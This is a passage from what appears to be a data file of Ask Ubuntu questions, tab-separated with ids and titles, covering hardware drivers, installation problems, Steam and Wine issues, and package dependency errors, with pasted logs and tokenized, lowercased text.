-- off -- output dp-3 -- off -- output dp-2 -- mode 1920x1080 -- pos 1920x0 -- rotate normal -- output dp-1 -- mode 1920x1080 -- pos 3840x0 -- rotate normal -- output dp-0 -- off xrandr : can not find crtc for output lvds-0
306584	sms server for ubuntu server	i am not sure where to begin this one , but i would like to run an sms server on my ubuntu server . when my postgresql database is updated with a new record , the server should listen and take the phone number stored in the record , and send a text message to it . i 'm not sure the best path to take to achieve this . do i need to write my own server or do you use packages out there ?
306589	the `` installing ubuntu alongside with windows '' option	i 'm new to linux and faced a problem which is really serious for me . i downloaded ubuntu 12.04 iso file and used unetbootin to make a usb stick . i had installed windows 8 that moment , unfortunately i could n't install ubuntu alongside win8 so i erased my disk and installed windows 7 . sadly i ca n't have `` installing ubuntu alongside with windows `` option now too . i tried other version of linux or even ubuntu 13.04 , but still the answer was no . i have : asus k55v 6g ram , 750g hdd , core i7 . my disk is mbr with : 1 ) 100 mb system reserve 2 ) c:126g primary 3 ) d:244g logical 4 ) e:284g logical 5 ) 43g unallocated i ca n't install ubuntu manually because it ca n't see my partitions or unallocated space , it just sees my whole hard disk entirely , i tried it and it erased whole of my hard disk . i do n't want to use wubi . btw all that i was talking here was about _64 bit oses . few month ago i had no problem of installing win7 and ubuntu alongside ! i 'm getting worry about maybe my laptop has physical or some kind of problem .
306590	12.04 unable to connect to wep	i am currently running a dual boot windows 7 and ubuntu 12.04 lts and have been unable to connect stably to my wep secured wifi , although i am able to connect to other wpa ( 2 ) connections just fine . in the rare occasion that connection is made , there is no internet access . i do not have access to the router settings as it belongs to the landlord . i have tried : updating to compat-drivers-3.9-rc4-2-su blocking ipv6 but still does not work . rfkill shows everything is unblocked . lspci output : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf106 [ geforce gtx 460m ] [ 10de:0dd1 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf106 high definition audio controller [ 10de:0be9 ] ( rev a1 ) 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) 04:00.0 usb controller [ 0c03 ] : fresco logic fl1000g usb 3.0 host controller [ 1b73:1000 ] ( rev 04 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) lsusb output : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 13d3:5205 imc networks bus 001 device 005 : id 0bda:0139 realtek semiconductor corp . bus 002 device 003 : id 18d1:4ee2 google inc . bus 002 device 004 : id 0461:4d99 primax electronics , ltd could i have some advice on how to solve this ?
306593	suspend mode not working on ubuntu 13.04	i have a sony vaio and can not make the suspend mode to work on ubuntu 13.04 i have checked all the configurations in power and the computer is supposed to suspend when i close the lid , but this does not happen . the computer continues to work . when i open the lid the screen is black and the system is not resumed . i have to restart the computer again by shutting it down with the power key . any suggestions ?
306594	why do ethernet devices not show up in `` /dev '' ?	generally i have noticed that plugging in a new device in a linux system causes a new entry to be listed in /dev ( assuming you have the correct drivers ) . for example : when you plug in a new hard drive you get /dev/sdb . when you plug in a serial device you get /dev/ttys0 . when i plug in an ethernet device , why do n't i get something like /dev/eth0 ? is there a device listing for ethernet ports ? i know you can see port names using ifconfig , i am just wondering if something shows up in /dev too .
306595	manage production and development enviroment ubuntu 12.04	we are using ubuntu 12.04 in our production environment . this server hosts apache , mysql and php for our corporate websites . we have 7 websites currently deployed using virtual hosts . looking for a solution on how to replicate or push changes onto our production machine by using a development machine . our main goal is to let web developers make their changes on our `` development '' server and then we can push the changes onto our `` production '' environment . basically the /var/www/* files and mysql databases . i already have a clone of our production environment setup in our development environment . any suggestions or help would be greatly appreciated .
306598	ca n't find networks on dell inspiron 1501	hi installed a clean install of ubuntu 12.04 on a dell inspiron 1501. according to sudo lspci -nnv my wireless card is listed as : broadcom corporation bcm4331 802.11b/g wlan subsystem : dell wireless 1390 wlan mini-card flags : bus master , fast devsel , latency 0 , irq 18 kernel driver in use : wl kernel modules : wl , ssb it just wo n't find any wireless networks , i have previously tried to install the windows drivers using ndiswrapper sudo modprobe ndiswrapper returns and error fatal : module ndiswrapper is not found can anyone help ? since i 'm new to ubuntu please let me know what extra details you want and i 'll update this post with the info lspci -nn -d 14e4 : 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) 08:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) dmesg | grep b43 [ 171.530952 ] b43-phy0 : broadcom 4311 wlan found ( core revision 10 ) [ 171.646898 ] b43-phy0 error : firmware file `` b43/ucode5.fw '' not found [ 171.646911 ] b43-phy0 error : firmware file `` b43-open/ucode6.fw '' not found [ 171.646917 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this friver version . please carefully read all instructions on this website fixed : fixed by blacklisting b43 and b43legacy and updating ndiswrapper then entering sudo modprobe ndiswrapper into terminal
306600	the partitioning tool does n't work	i 've tried different ways to get the 12.04 version onto my new laptop . i 'm able to boot from cd , but this is only good for the session . when i try to install alongside windows , the section where we the partioning tool should come up and ask me if i want to do alongside windows , do a complete ubuntu install or something else . but only some new tool , that looks like i 'm supposed to do the partioning myself . yikes ! ! but even then , the buttons for add , new table , delete , revert , etc , were n't getting any response . this is a new laptop , so there 's plenty of room . but i need to apparently partition this windows professional drive ... manually . how can i get this done ? any guidance , links , etc . would be greatly appreaciated .
306602	problems with steam in ubuntu 13.04	i have ubuntu 13.04 64-bit installed . i also have steam installed . steam launches normally each time but every time i search team fortress 2 it loads for a short time and then closes automatically . i went `` google is my friend '' . i could n't find any answers that are related to my problem . here 's the log : running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 4027 with name 0eblobregistrymutex_96da982a39fa7df8543b1689bf458644 removing stale semaphore last operated on by process 4027 with name 0eblobregistrysignal_96da982a39fa7df8543b1689bf458644 removing stale semaphore last operated on by process 4027 with name 0emsteamengineinstance removing stale semaphore last operated on by process 4027 with name 0esteamenginelock gtk-message : failed to load module `` overlay-scrollbar '' installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) [ 0610/132850 : warning : proxy_service.cc ( 646 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) ( steam:4221 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! generating new string page texture 2 : 48x256 , total string texture memory is 49.15 kb generating new string page texture 3 : 384x256 , total string texture memory is 442.37 kb installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) `menu_proxy_module_load ' : /home/desertedfreeman/.local/share/steam/ubuntu12_32/steam : undefined symbol : menu_proxy_module_load ( steam:4221 ) : gtk-warning ** : failed to load type module : ( null ) ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:4221 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) adding license for package 0 adding license for package 13674 adding license for package 28208 adding license for package 28221 adding license for package 28305 adding license for package 28367 adding license for package 28368 roaming config store loaded successfully - 1416 bytes . migrating temporary roaming config store installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) execcommandline : `` /home/desertedfreeman/.local/share/steam/ubuntu12_32/steam '' generating new string page texture 74 : 256x256 , total string texture memory is 704.51 kb generating new string page texture 75 : 128x256 , total string texture memory is 835.58 kb generating new string page texture 76 : 128x256 , total string texture memory is 131.07 kb generating new string page texture 77 : 32x256 , total string texture memory is 868.35 kb generating new string page texture 78 : 64x256 , total string texture memory is 933.89 kb capijobrequestuserstats - server response failed 2 system startup time : 10.76 seconds running steam on ubuntu 13.04 64-bit steam_runtime has been set by the user to : /home/desertedfreeman/.local/share/steam/ubuntu12_32/steam-runtime execcommandline : `` /home/desertedfreeman/.steam/root/ubuntu12_32/steam steam : //open/driverhelperready '' execsteamurl : `` steam : //open/driverhelperready '' [ 0610/132914 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0610/132915 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0610/132915 : error : reference_audio_renderer.cc ( 45 ) ] not implemented reached in virtual void media : :referenceaudiorenderer : :oncreated ( media : :audiooutputcontroller* ) [ 0610/132915 : error : reference_audio_renderer.cc ( 49 ) ] not implemented reached in virtual void media : :referenceaudiorenderer : :onplaying ( media : :audiooutputcontroller* ) [ 0610/132915 : error : alsa_output.cc ( 684 ) ] failed querying delay : input/output error uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20130610132915_1.dmp /home/desertedfreeman/.local/share/steam/steam.sh : line 704 : 4221 illegal instruction ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-4f2229f2-1527-42c8-89b4-0b9e52130610 please help .
306606	ubuntu 12.04 ( 64bit ) wine midi has no output	i have ubuntu 12.04 ( kxstudio version ) with several midi programs that work well both input and output . i installed wine 1.5.31 so i could run studio4 by midisoft . the program runs , accepting midi input from my midi keyboard . it can not play the midi file back . i assumed there was a problem with studio4 so i installed midipiano . this give the a good input/output result after i configured the options `` a2jnidid - port '' and `` usb uno midi interface midi 1 '' . when i try to configure studio4 the same way , wine will not let me . i insists on connecting input to `` midi through port 0 '' . thus the application does not play .
306610	printer canon pixma ip 4500 not printing - stoping at page processing	i have a pixma ip 4500 just stopped printing , it 's just processing the page stops at 1,24 % . being a total noob , here is part troubleshoot output ( i could n't paste the whole file ) , please let me know if you need some additional data and how/where should i find them so i can post them ( thanks ) : { 'cups_connection_failure ' : false } page 2 ( choose printer ) : { 'cups_dest ' : < cups.dest canon-ip4500-series ( default ) > , 'cups_instance ' : none , 'cups_queue ' : 'canon-ip4500-series ' , 'cups_queue_listed ' : true } page 3 ( check printer sanity ) : { 'cups_device_uri_scheme ' : u'usb ' , 'cups_printer_dict ' : { 'device-uri ' : u'usb : //canon/ip4500 % 20series ? serial=323bcc ' , 'printer-info ' : u'canon ip4500 series ' , 'printer-is-shared ' : false , 'printer-location ' : u'maja-pc ' , 'printer-make-and-model ' : u'canon pixma ip4500 - cups+gutenprint v5.2.7 simplified ' , 'printer-state ' : 4 , 'printer-state-message ' : u'printing page 1 , 14 % ' , 'printer-state-reasons ' : [ u'none ' ] , 'printer-type ' : 2273308 , 'printer-uri-supported ' : u'ipp : //localhost:631/printers/canon-ip4500-series ' } , 'cups_printer_remote ' : false , 'is_cups_class ' : false , 'local_cups_queue_attributes ' : { 'auth-info-required ' : u'none ' , 'charset-configured ' : u'utf-8 ' , 'charset-supported ' : [ u'us-ascii ' , u'utf-8 ' ] , 'color-supported ' : true , 'compression-supported ' : [ u'none ' , u'gzip ' ] , 'copies-default ' : 1 , 'copies-supported ' : ( 1 , 9999 ) , 'cups-version ' : u'1.5.0 ' , 'device-uri ' : u'usb : //canon/ip4500 % 20series ? serial=323bcc ' , 'document-format-default ' : u'application/octet-stream ' , 'document-format-supported ' : [ u'application/octet-stream ' , u'application/openofficeps ' ,
306611	ca n't open firefox after upgrade to 13.04	i just upgraded my 12.10 to 13.04 with `` great '' difficulty , but a few issues persist . firefox refuse even to open when i click the icon . i had to tweak a bit to complete the 13.04 upgrade , so it may have something to do with this happening . funnily enough , i managed to make chrome work by typing in gateway digits on the bar , so i can rule out the connection or hardware issues . when i tried to open firefox through terminal by typing `` firefox '' , i received the following message . could someone interpret it for me ? glib critical ** : g_slice_set_config : assertion sys_page_size =0=0 failed could not create gnome accelerators directory home/tom/gnome2/accels permission denied what went wrong and what can i do ?
306618	how to install recommend packages from a file ( package.deb ) ?	i have a package.deb and want to install all dependencies ( depends field in debian/control ) and all recommend packages ( recommends field in debian/control ) . options considered so far : gdebi apparently does not support installing recommend packages . `` sudo dpkg -i package.deb '' followed by `` sudo apt-get install -- install-recommends -f '' also only installs dependencies ( depends field in debian/control ) , but not recommend packages ( recommends field in debian/control ) . any other ideas ?
306619	install ubuntu touch on a hisense sero 7	i want to install ubuntu touch on a hisense sero 7 . so far , i have not been able to root the device . i have tried tutorials online , none have worked . i tired rooting with superoneclick2013 v2.3.3 , to no avail . can someone recommend a tool to root this device ? has anyone installed ubuntu on this device yet ? i am not interested in running a vnc virtual machine with ubuntu within the android os .
306624	external monitor ubuntu 13.04 for nvidi quadro 1000m on w530	i have just got a thinkpad w530 with nividia quadro 1000m graphic and i can not connect an external monitor properly . it shows up on ubuntu 13.04 but it seems there might be a problem with the driver since my mouse cursor keeps blinking when i change the display setting to the twin view . do you know how i can have it worked ? cheers , kia
306626	jbd2 constantly writing to disk	i know there are related issues , but none of them seem to apply to my case . below is iotop output . jbd2 is constantly above 90 % usage . it 's been grinding away for 2 days . it stops for a while after a reboot , but then starts again after some time . i 'm using 32bit ubuntu 13.04 . 200gb wd disk . smart disabled in bios . no raid configs . total disk read : 0.00 b/s | total disk write : 1997.25 k/s tid prio user disk read disk write swapin io > command 307 be/3 root 0.00 b/s 811.58 b/s 0.00 % 93.68 % [ jbd2/sda1-8 ] 15454 be/4 curvv 0.00 b/s 1623.16 b/s 0.00 % 0.88 % firefox 4305 be/4 curvv 0.00 b/s 721.23 k/s 0.00 % 0.70 % gvfsd-metadata 2048 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % console-kit-daemon -- no-daemon 1 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % init 2 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ kthreadd ] 3 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ ksoftirqd/0 ] ...
306632	libx11-dev can not install	i run the command sudo apt-get install libx11-dev and it returns with an error stating that the package it needs to download does not exist in the online pool . a â¨404 page not found '' error .
306634	differences between aws ubuntu image and a fresh install ?	i 've been using ubuntu only on aws for a year now . i 'm now trying to set up a virtual environment as similar to my aws one as possible , and i 'm kinda confused . when i spin up an aws server , the magic box sets me up with the username ubuntu and i log in with my key file and no password.. then i just get to business . in the ubuntu setup , it encourages me to enter my full name and password . i have no issue with that , but i just want to be as similar to my aws servers as possible . what does an amazon image have in it that a blank slate of ubuntu server does n't ? what 's the easiest way to emulate my existing installations on a fresh install ? what are other differences i may run into ?
306636	control vlc with bluetooth headset	i have the s305 motorola bluetooth headset . i can control other music players ( like audacious or goggles ) from my headset but not vlc . is there some way to control vlc with a bt headset ?
306640	which ubuntu version to download for toshiba c850 laptop with rtl8723 ?	can you tell me which version of ubuntu to install on toshiba c850 laptop with wireless card rtl8723 . i need the bootable cd/dvd with all packages installed like linux headers , build essentials , make etc.so that after installing compatible driver , it can connect to wify . not received any reply on my askubuntu qs also on my thread in ubuntu forum . can anyone help ?
306641	why does my ipv4 adress keep changing ?	i am running many servers off of my computer and i need to port forward to do that . but recently my ipv4 address keeps changing when i shut my computer off and turn it back on . i have no clue why this is happening .
306651	game development with accomplishments	hey could game developers make accomplishments for game players to earn forever who buys games from the ubuntu software center ?
306652	ca n't select blue yeti pro usb microphone in sound settings menu	today , i recieved a shiny new blue yeti pro usb microphone in the mail . i did my research to make sure that it would work . i found the following websites , and this is what led me to believe that it would work without any issues , despite the fact that it is a usb 2.0 device : http : //community.linuxmint.com/hardware/view/12511 http : //geardiary.com/2011/06/28/revi ... hone-yeti-pro/ so- i got it out and plugged it in . the red light on the mute button lit up and started flashing , which means that the mic is muted . i un-muted it- so far , so good . i went to the sound settings menu . it was recognized as : digital input ( s/pdif ) blue usb audio 2.0 and blue usb audio 2.0 analog stereo . i tried to select them , one at a time as the input device . each time i tried to select it , the sytem settings would crash and shut off . then , i tried to select it using jack instead . in jack , i was able to select it as the input device without issue . i fired up the jack server and did n't get loads of xruns , so i opened ardour . i could n't get signal flowing in to ardour no matter what i tried . now it 's getting frustrating . i shut off the jack server and decided to try something else . so next i open a terminal and fire up alsamixer and got similar results , the microphone is recognized and i selected it as the sound capture device . the levels look good so i open audacity and select the microphone as the capture device in audacity . the same thing happened- no audio signal was getting in to the computer . so , i decided to try installing and running pavucontrol . the microphone is recognized . great . i can select it . great . i fire up audacity again and the same thing happens- no audio signal to the computer . the next thing i tried was killing pulse and just using alsa . i tried bothpactl exit and pulseaduio -- kill and try selecting the microphone again with alsamixer- same result each time , no signal to the computer . at this point , i 'm really frustrated . i tried making sure of the the dumb stuff , like `` is it plugged in '' and `` maybe i should try the other usb ports '' . no dice . i tried the direct headphone monitor on the mic to see if it 's picking up sound at all , and it is . i 'm completely baffled . when i run lsusb in a terminal i get the following output : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 13d3:5710 imc networks bus 002 device 005 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 006 : id 074d:0002 micronas gmbh i uplugged it and ran lsusb one more time to see which device it was for sure . it 's the micronas gmbh device . at least that 's some information . then i rancat /proc/asound/cards and got the following output : 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xdfc00000 irq 52 1 [ b20 ] : usb-audio - blue usb audio 2.0 blue blue usb audio 2.0 at usb-0000:00:1d.0-1.2 , high speed also , when i open the system settings from the terminal with gnome-control-center i get the following output with regard to audio : ( gnome-control-center:3593 ) : sound-cc-panel-warning ** : active_output_update - could n't find a stream from the supposed active output ( gnome-control-center:3593 ) : sound-cc-panel-warning ** : active_input_update - could n't find a stream from the supposed active input when i try to select my microphone , the system settings window still closes and i get this in the terminal : segmentation fault maybe there 's something useful there ? so- that 's what i 've got . a pretty sweet microphone that would be a really useful tool if it worked . i thought it would , and it does n't . i am completely perplexed and do n't know what i should do next . does anyone have any ideas or advice ?
306654	trying to connect to facebook using online accounts system settings	ok so i 'm trying to connect my facebook account in ubuntu 13.04 raring ringtail in the system settings and every time i try to connect it opens a firefox window and then i see a `` blank '' url thing as well as `` success '' and `` security alert '' in big red letters . i do n't know what the heck is going on and i need help .
306656	computer asking me for login keyring i did n't set ?	i recently acquired an ubuntu matrix netbook . when i leave it a while on , it locks itself up and asks me then for a password . recently it asks me for another password that says : enter password to unlock your login keyring . i did not set this password . i also ca n't use the guest session . maybe it 's something simple but i really do n't know what to do .
306657	step-by-step instructions for installing programs in ubuntu 13.04	total novice , ex-windows user here , i would love it if you guys could help me a bit . i managed to boot ubuntu from a dvd and it 's all running smoothly , however , i decided to try installing openoffice and when i downloaded the file in firefox , i expected the installation process to be a simple , windows-esque wizard that installs everything , instead i get a compressed file with a load of .deb files and i have no idea what i 'm supposed to do with them , having never needed to do this in the past . so , upon going to the openoffice support , i found installation instructions involving loads of terminal commands , only i 'm not at all sure how to even access terminal , or if there 's anything in the software centre you can recommend to me that might handle the installs nice and easy for me . i 've had a couple of other teething problems , but nothing major , i 'll ask about those later , thank you in advance , and yes , i 'm willing to use terminal if needs be , no way like the hard way and all that .
306665	can i play windows ( steam ) games on ubuntu ?	i am downloading ubuntu and i really want to play windows games from steam but i do n't want it to replace my os .
306675	why i have to install same update more than once ?	in this screenshot , there are 2 files with the same name . is n't this only for a single thing in ubuntu ? why i have to install one same looking update more than once ?
306676	do i need a disc drive to install ubuntu ?	my computer does n't have a disc drive and i am unsure how to continue installing without one .
306685	ubuntu version for ati radeon 9200 video card	what is the highest version of ubuntu that i can install in my pentium 4 laptop with an ati mobility radeon 9200 video card ? i tried to install 13.04 but i could n't start the gui . i read that there are compatibility problems since the drivers are not available in the latest releases . i currently have installed ubuntu 9.04 and it works fine . thank you . victor
306689	making a screenshot in xfce	i installed xfce desktop and removed ubuntu . it turns out that making a screenshot requires running a special application called screenshot instead of just pressing prtsc button . i wonder , how do i do a screenshot in the same way i did before by pressing prtsc button ?
306690	why should i prefer ppa wine over the wine in the official repository ?	looking at most ( all ? ) tutorials on how to install windows apps into ubuntu , they instruct to add the ppa : ubuntu-wine/ppa repository , and then install the latest wine ( currently wine1.5 ) . sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5 wine is also available in the official repositories , and the following command works ( without having to add a new repository ) : sudo apt-get install wine so . why should i prefer the ppa ? what is missing in the official wine that i should use the ppa instead ?
306691	persistent error when running bleachbit as administrator	i 'm trying to run bleachbit as an administrator , and i seem to be persistently running in to an error each time : [ errno 13 ] permission denied : '/root/tmpuoldmdut75bu7pp8f99zvztqxarb.soguzdito1gbldv9qngbucn0urlgv0e02snfnautelr6d-v30eftyametpaaf9nmzbjtz5edimsb1yvapigtpkmtu7wtcjw7ahp4zc1qtdbl6k8nquljpuamwzflzvwmn0g8vi7eqfu.d86xogmlbsgtx81cc8wvuc xtb387jubkuhdxakf sdgbatopj94cowdjnjxv8m-gsn6u_sle_jecam'
306696	ios 6 banshee syncing	i got banshee to detect my ipod and it do the sync but the new songs simply just do n't pop up on the music app . on the program on my ubuntu everything looks fine . its super annoying i have a ipod touch 5g running the latest version 6.1.3 please assist me with this issue
306700	ubuntu 13.04 touchscreen and touchpad support on dell xps 12	is it possible to run ubuntu 13.04 on the dell xps 12 with full multi-touch touchscreen and multi-touch touchpad support ? does the touchscreen work when a second monitor is hooked up ? how about screen rotation into portrait mode when used as a tablet ? any special setup required ?
306702	unity dont show its elements , only desktop files	i was installing nvidia drivers for geforce gt 640m ( ubuntu 13.04 ) . after the install , when i login with my user , unity does not appear . no sidebar with programs , no topbar with menus . i 've read the following topics trying to found a solution : how well do laptops with nvidia optimus work ? how to install the nvidia drivers desktop does not show when i installed nvidia drivers ! unity gui doesnt show after nvidia driver install ( ubuntu 12.10 ) unity does n't appear after installing nvidia drivers however , none of them made unity show its elements again . the geforce gt 640m is an optimus graph card , so i 've already installed bumblebee . the notebook is an avell ( an local manufacturer ) b153 with an i5 ivy bridge - 3230m , 8gb ram .
306703	compile opengl program ( missing gl/gl.h )	i am a complete linux/ubuntu noob , so i apologize for any dumb portions of this question or follow up ones . i am trying to get a program that my software engineering class 's group wrote onto my home computer . at school , we have linux , and it will compile and run fine there . i downloaded vmware , installed ubuntu 13.04 on a virtual machine , and now am trying to get my program to open . when ever i try to run my make file however , i get an error that says gcc -i../include -pthread -o1 -c rain.c in file included from rain.c:19:0 : ../include/gl/glfw.h:176:21 : fatal error : gl/gl.h : no such file or directory compilation terminated . make : *** [ rain.o ] error 1 would anyone happen to know why it ca n't find this file , when it can on my school computers ? and what i 'd need to do to download it or get it in the right spot ? thanks ! update : problem solved . see my comment to the answer i selected .
306704	how do i get ubuntu option after installtion on windows 7	i have installed ubuntu along side windows 7 . after restart i got a blank screen . there after i restarted it manually now i do not understand how to select ubuntu os . my laptop directly turns on windows 7 please help
306707	how i can find actual using of package ?	i need to find actual process or dependence on other library in running system for package by name . how i can realize it ?
306711	skype installation dependencies issue	can not install skype.. lots of dependencies issues.. please help ... . : ( aptitude shows this solution only.. my os is ubuntu 12.04 lts tau @ ubuntu : ~ $ sudo aptitude install skype -- without-recommends the following new packages will be installed : libasound2 : i386 { a } libaudio2 : i386 { a } libc-bin : i386 { ab } libc6 : i386 { ab } libdbus-1-3 : i386 { ab } libexpat1 : i386 { ab } libffi6 : i386 { a } libfontconfig1 : i386 { a } libfreetype6 : i386 { ab } libgcc1 : i386 { a } libglib2.0-0 : i386 { a } libice6 : i386 { a } libjpeg-turbo8 : i386 { a } libjpeg8 : i386 { a } liblcms1 : i386 { a } libmng1 : i386 { a } libpcre3 : i386 { a } libpng12-0 : i386 { a } libqt4-dbus : i386 { ab } libqt4-declarative : i386 { ab } libqt4-network : i386 { ab } libqt4-script : i386 { ab } libqt4-sql : i386 { ab } libqt4-xml : i386 { ab } libqt4-xmlpatterns : i386 { ab } libqtcore4 : i386 { ab } libqtgui4 : i386 { ab } libselinux1 : i386 { a } libsm6 : i386 { a } libstdc++6 : i386 { a } libtiff4 : i386 { ab } libuuid1 : i386 { a } libx11-6 : i386 { a } libxau6 : i386 { a } libxcb1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxi6 : i386 { a } libxrender1 : i386 { a } libxss1 : i386 { a } libxt6 : i386 { a } libxv1 : i386 { a } skype skype-bin : i386 { a } zlib1g : i386 { a } the following packages are recommended but will not be installed : libasound2-plugins : i386 libcups2 : i386 libqt4-sql-mysql : i386 libqt4-sql-odbc : i386 libqt4-sql-psql : i386 libqt4-sql-sqlite : i386 qdbus : i386 sni-qt : i386 0 packages upgraded , 45 newly installed , 0 to remove and 0 not upgraded . need to get 43.6 mb of archives . after unpacking 93.6 mb will be used . the following packages have unmet dependencies : libc-bin : conflicts : libc-bin : i386 but 2.15-0ubuntu10 is to be installed . libc-bin : i386 : conflicts : libc-bin but 2.15-0ubuntu10.2 is installed . libqt4-declarative : breaks : libqt4-declarative : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-declarative : i386 : breaks : libqt4-declarative ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libdbus-1-3 : breaks : libdbus-1-3 : i386 ( ! = 1.4.18-1ubuntu1.3 ) but 1.4.18-1ubuntu1 is to be installed . libdbus-1-3 : i386 : breaks : libdbus-1-3 ( ! = 1.4.18-1ubuntu1 ) but 1.4.18-1ubuntu1.3 is installed . libqt4-script : breaks : libqt4-script : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-script : i386 : breaks : libqt4-script ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libqt4-network : breaks : libqt4-network : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-network : i386 : breaks : libqt4-network ( ! = 